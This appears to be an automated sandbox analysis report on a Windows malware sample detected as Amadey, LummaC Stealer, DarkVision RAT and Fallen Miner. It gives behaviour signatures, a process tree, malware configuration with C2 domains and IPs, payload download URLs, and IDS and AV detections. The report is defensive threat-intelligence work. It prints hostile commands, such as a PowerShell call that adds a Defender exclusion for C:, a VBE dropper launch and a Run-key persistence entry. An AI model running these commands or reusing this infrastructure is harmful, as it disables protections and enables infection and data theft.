Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
13s1HMkHKv.exe

Overview

General Information

Sample name:13s1HMkHKv.exe
renamed because original name is a hash value
Original sample name:f48ff9bc196aad68da3d4376c9649d9f.exe
Analysis ID:1636853
MD5:f48ff9bc196aad68da3d4376c9649d9f
SHA1:6e322f4efcc330514595db2b0d4b9c46f0947fa9
SHA256:11195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected DarkVision Rat
Yara detected Fallen Miner
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Binaries Write Suspicious Extensions
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 13s1HMkHKv.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\13s1HMkHKv.exe" MD5: F48FF9BC196AAD68DA3D4376C9649D9F)
    • rapes.exe (PID: 5860 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: F48FF9BC196AAD68DA3D4376C9649D9F)
  • rapes.exe (PID: 5288 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: F48FF9BC196AAD68DA3D4376C9649D9F)
  • rapes.exe (PID: 7960 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: F48FF9BC196AAD68DA3D4376C9649D9F)
    • s7MG2VL.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe" MD5: 1255E23EA313BB1A6E71D78B2F829262)
    • ZqkKpwG.exe (PID: 412 cmdline: "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe" MD5: 73932EB7D7DF842D5F358700626BE68C)
      • conhost.exe (PID: 2116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ZqkKpwG.exe (PID: 6364 cmdline: "C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe" MD5: 73932EB7D7DF842D5F358700626BE68C)
      • WerFault.exe (PID: 7196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 404 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • eAzoDbY.exe (PID: 1416 cmdline: "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe" MD5: 2002FDF412315D31FCDF5B6ACBCAA53C)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • eAzoDbY.exe (PID: 7668 cmdline: "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe" MD5: 2002FDF412315D31FCDF5B6ACBCAA53C)
      • eAzoDbY.exe (PID: 7660 cmdline: "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe" MD5: 2002FDF412315D31FCDF5B6ACBCAA53C)
      • eAzoDbY.exe (PID: 4224 cmdline: "C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe" MD5: 2002FDF412315D31FCDF5B6ACBCAA53C)
      • WerFault.exe (PID: 2108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 408 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • 8sb9w_003.exe (PID: 4840 cmdline: "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe" MD5: 0571EBBB85445ED7C252D71B63A91F4E)
      • cmd.exe (PID: 7356 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1868 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • svchost.exe (PID: 4260 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • cmd.exe (PID: 3284 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.bat" """ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ps.exe (PID: 3616 cmdline: "C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe" "" MD5: 5E41FCBF3434B7408FE70D6D81A943B1)
          • powershell.exe (PID: 3232 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5052 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cls.exe (PID: 596 cmdline: "C:\Users\user\AppData\Local\Temp\\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe" "{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}" MD5: B9032767E054F3F99104B5B9D7E597C7)
    • yo7qmvz.exe (PID: 2240 cmdline: "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe" MD5: 898521D79EBB6A67D80237F286E25177)
      • yo7qmvz.exe (PID: 2828 cmdline: "C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe" MD5: 898521D79EBB6A67D80237F286E25177)
    • st22BJg.exe (PID: 6620 cmdline: "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe" MD5: DBD46D6A4A15FAED18B20BE54BF49B40)
      • conhost.exe (PID: 1664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 748 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • file.exe (PID: 2724 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: BCF10E3C07383D9400F0FA98F3F999D5)
        • ShortcutTaskAgent.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exe" MD5: 7700F61BECA60DB53658C52A05B01941)
          • ShortcutTaskAgent.exe (PID: 5068 cmdline: C:\Users\user\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe MD5: 7700F61BECA60DB53658C52A05B01941)
            • cmd.exe (PID: 4560 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • EZs3CZC.exe (PID: 4216 cmdline: "C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe" MD5: C6067CD3B970C7F932F73F4084DF78E8)
    • dx3hXS1.exe (PID: 3592 cmdline: "C:\Users\user\AppData\Local\Temp\10192270101\dx3hXS1.exe" MD5: 74870B85AC926C53E0EAF2C42265B939)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "ddf4bb21335e58d5b0f7d6461dc868d9f8edb80615c104e1b714"}
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
{"C2": "82.29.67.160", "Port": 443}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exeJoeSecurity_FallenMinerYara detected Fallen MinerJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\EZs3CZC[1].exeJoeSecurity_FallenMinerYara detected Fallen MinerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            00000023.00000002.2466972573.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              00000023.00000003.2241106729.0000000000B4F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 27 entries
                SourceRuleDescriptionAuthorStrings
                35.2.yo7qmvz.exe.400000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  17.2.ZqkKpwG.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    35.2.yo7qmvz.exe.400000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      11.2.rapes.exe.220000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                        0.2.13s1HMkHKv.exe.a40000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                          Click to see the 16 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe, ParentProcessId: 4840, ParentProcessName: 8sb9w_003.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7356, ProcessName: cmd.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe, ParentProcessId: 6620, ParentProcessName: st22BJg.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 748, ProcessName: wscript.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe, ParentProcessId: 6620, ParentProcessName: st22BJg.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 748, ProcessName: wscript.exe
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe, ParentProcessId: 6620, ParentProcessName: st22BJg.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 748, ProcessName: wscript.exe
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 4260, TargetFilename: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.bat
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\{044B9118-D09F-44DE-8820-983AA965DB95}\dmcertinst.exe {65ECE49D-E44B-4E45-9F95-675677E13036}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\svchost.exe, ProcessId: 4260, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{F1A8D70E-81F9-4200-B46C-ECA432751942}
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe, ParentProcessId: 4840, ParentProcessName: 8sb9w_003.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7356, ProcessName: cmd.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe, ParentProcessId: 4840, ParentProcessName: 8sb9w_003.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4260, ProcessName: svchost.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10191470101\st22BJg.exe, ParentProcessId: 6620, ParentProcessName: st22BJg.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 748, ProcessName: wscript.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 1868, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exe, ParentProcessId: 4840, ParentProcessName: 8sb9w_003.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4260, ProcessName: svchost.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-13T08:08:16.568202+010020283713Unknown Traffic192.168.2.661662188.114.96.3443TCP
                          2025-03-13T08:08:19.411692+010020283713Unknown Traffic192.168.2.661664188.114.96.3443TCP
                          2025-03-13T08:08:21.176420+010020283713Unknown Traffic192.168.2.661665188.114.96.3443TCP
                          2025-03-13T08:08:22.167222+010020283713Unknown Traffic192.168.2.661666188.114.96.3443TCP
                          2025-03-13T08:08:23.893279+010020283713Unknown Traffic192.168.2.661669188.114.96.3443TCP
                          2025-03-13T08:08:24.725021+010020283713Unknown Traffic192.168.2.661670188.114.96.3443TCP
                          2025-03-13T08:08:26.397404+010020283713Unknown Traffic192.168.2.661673188.114.96.3443TCP
                          2025-03-13T08:08:27.495236+010020283713Unknown Traffic192.168.2.661674188.114.96.3443TCP
                          2025-03-13T08:08:28.097724+010020283713Unknown Traffic192.168.2.661675188.114.96.3443TCP
                          2025-03-13T08:08:28.994643+010020283713Unknown Traffic192.168.2.661678188.114.96.3443TCP
                          2025-03-13T08:08:31.044443+010020283713Unknown Traffic192.168.2.661680188.114.96.3443TCP
                          2025-03-13T08:08:31.072851+010020283713Unknown Traffic192.168.2.661681188.114.96.3443TCP
                          2025-03-13T08:08:31.930355+010020283713Unknown Traffic192.168.2.661683188.114.96.3443TCP
                          2025-03-13T08:08:33.642775+010020283713Unknown Traffic192.168.2.661684188.114.96.3443TCP
                          2025-03-13T08:08:33.716829+010020283713Unknown Traffic192.168.2.661685104.26.9.202443TCP
                          2025-03-13T08:08:34.828682+010020283713Unknown Traffic192.168.2.661688188.114.96.3443TCP
                          2025-03-13T08:08:35.004635+010020283713Unknown Traffic192.168.2.661686188.114.96.3443TCP
                          2025-03-13T08:08:36.513389+010020283713Unknown Traffic192.168.2.661689104.21.48.1443TCP
                          2025-03-13T08:08:36.811716+010020283713Unknown Traffic192.168.2.661690188.114.96.3443TCP
                          2025-03-13T08:08:38.073665+010020283713Unknown Traffic192.168.2.661693104.26.9.202443TCP
                          2025-03-13T08:08:39.788467+010020283713Unknown Traffic192.168.2.661694188.114.96.3443TCP
                          2025-03-13T08:08:40.103273+010020283713Unknown Traffic192.168.2.661695188.114.96.3443TCP
                          2025-03-13T08:08:40.390343+010020283713Unknown Traffic192.168.2.661697188.114.96.3443TCP
                          2025-03-13T08:08:44.398932+010020283713Unknown Traffic192.168.2.661701188.114.96.3443TCP
                          2025-03-13T08:08:44.686840+010020283713Unknown Traffic192.168.2.661702188.114.96.3443TCP
                          2025-03-13T08:08:47.451939+010020283713Unknown Traffic192.168.2.661731188.114.96.3443TCP
                          2025-03-13T08:08:48.973755+010020283713Unknown Traffic192.168.2.661732188.114.96.3443TCP
                          2025-03-13T08:08:50.531985+010020283713Unknown Traffic192.168.2.661734188.114.96.3443TCP
                          2025-03-13T08:08:54.397087+010020283713Unknown Traffic192.168.2.661737188.114.96.3443TCP
                          2025-03-13T08:08:57.721076+010020283713Unknown Traffic192.168.2.661740188.114.96.3443TCP
                          2025-03-13T08:09:02.617872+010020283713Unknown Traffic192.168.2.661742188.114.96.3443TCP
                          2025-03-13T08:09:08.950895+010020283713Unknown Traffic192.168.2.661743104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-13T08:08:42.906545+010020010463Misc activity176.113.115.780192.168.2.661700TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-13T08:08:35.180654+010020456181A Network Trojan was detected192.168.2.66169182.29.67.160443TCP
                          2025-03-13T08:08:39.465600+010020456181A Network Trojan was detected192.168.2.66169882.29.67.160443TCP
                          2025-03-13T08:08:43.493245+010020456181A Network Trojan was detected192.168.2.66170682.29.67.160443TCP
                          2025-03-13T08:08:47.524509+010020456181A Network Trojan was detected192.168.2.66173382.29.67.160443TCP
                          2025-03-13T08:08:51.571838+010020456181A Network Trojan was detected192.168.2.66173582.29.67.160443TCP
                          2025-03-13T08:08:55.613972+010020456181A Network Trojan was detected192.168.2.66173982.29.67.160443TCP
                          2025-03-13T08:08:59.859490+010020456181A Network Trojan was detected192.168.2.66174182.29.67.160443TCP
                          2025-03-13T08:09:03.894632+010020456181A Network Trojan was detected192.168.2.66174582.29.67.160443TCP
                          2025-03-13T08:09:08.105611+010020456181A Network Trojan was detected192.168.2.66174782.29.67.160443TCP
                          2025-03-13T08:09:12.098828+010020456181A Network Trojan was detected192.168.2.66175082.29.67.160443TCP
                          2025-03-13T08:09:17.609377+010020456181A Network Trojan was detected192.168.2.66175482.29.67.160443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-13T08:08:05.864701+010028561471A Network Trojan was detected192.168.2.661658176.113.115.680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-03-13T08:08:10.528216+010028033053Unknown Traffic192.168.2.661660176.113.115.780TCP
                          2025-03-13T08:08:17.527086+010028033053Unknown Traffic192.168.2.661663176.113.115.780TCP
                          2025-03-13T08:08:23.981887+010028033053Unknown Traffic192.168.2.661671176.113.115.780TCP
                          2025-03-13T08:08:30.295922+010028033053Unknown Traffic192.168.2.661682107.174.192.17980TCP
                          2025-03-13T08:08:36.502396+010028033053Unknown Traffic192.168.2.661692176.113.115.780TCP
                          2025-03-13T08:08:42.776863+010028033053Unknown Traffic192.168.2.661700176.113.115.780TCP
                          2025-03-13T08:08:55.368746+010028033053Unknown Traffic192.168.2.661738176.113.115.780TCP
                          2025-03-13T08:09:09.354288+010028033053Unknown Traffic192.168.2.661748176.113.115.780TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: 13s1HMkHKv.exeAvira: detected
                          Source: https://jowinjoinery.icu/Avira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/bdWUagAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/bdWUa4jAvira URL Cloud: Label: malware
                          Source: citydisco.bet/gdJISAvira URL Cloud: Label: malware
                          Source: https://crosshairc.life/dAnjhwAvira URL Cloud: Label: malware
                          Source: http://176.113.115.7/files/7033027882/ZqkKpwG.exeAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/bdWUaAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/bdWUadbAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/OAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/YAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/gAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/cAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu//Avira URL Cloud: Label: malware
                          Source: https://citydisco.bet/gdJISAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu:443/bdWUaAvira URL Cloud: Label: malware
                          Source: https://jowinjoinery.icu/;Avira URL Cloud: Label: malware
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ZqkKpwG[1].exeAvira: detection malicious, Label: TR/Crypt.Agent.xahyo
                          Source: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exeAvira: detection malicious, Label: TR/AVI.Agent.onlpz
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\eAzoDbY[1].exeAvira: detection malicious, Label: TR/Crypt.Agent.wdlug
